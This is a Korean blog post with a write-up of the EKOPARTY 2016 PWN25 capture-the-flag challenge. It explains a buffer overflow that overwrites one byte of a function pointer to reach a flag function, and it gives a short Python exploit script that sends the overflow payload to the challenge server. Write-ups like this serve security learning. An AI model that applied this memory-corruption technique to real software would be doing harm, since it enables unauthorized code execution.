y0u_bat
[2016] EKOPARTY PWN25 본문
[2016] EKOPARTY PWN25
Ultra baby
(pwn, 25 points, solved by 261)
nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000
이문제는 bof를 해서, 함수포인터를 조작하여 flag라는 곳으로 실행시키면, 플래그를 뱉는 문제이다.
함수포인터를 1바이트 조작 할 수 있게 되는데, 이걸 이용해서 Flag함수가 실행 되겠끔 하면 된다.
from socket import *
HOST = "9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site"
PORT = 55000
def recvuntil(t):
data = ''
while not data.endswith(t):
tmp = s.recv(1)
if not tmp: break
data += tmp
return data
s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))
print "A"
print recvuntil("\n")
s.send("a"*24+"\xf3")
print s.recv(1024)
'CTF' 카테고리의 다른 글
[BCTF] BCloud (0) | 2016.11.18 |
---|---|
2016 Whitehat contest Malloc (5) | 2016.11.02 |
[2016] EKOPARTY PWN100 (0) | 2016.10.29 |
[2016] HDCON System Q3-1 (0) | 2016.10.28 |
[CodeGate2015] BookStore 풀이 (0) | 2015.11.09 |
Comments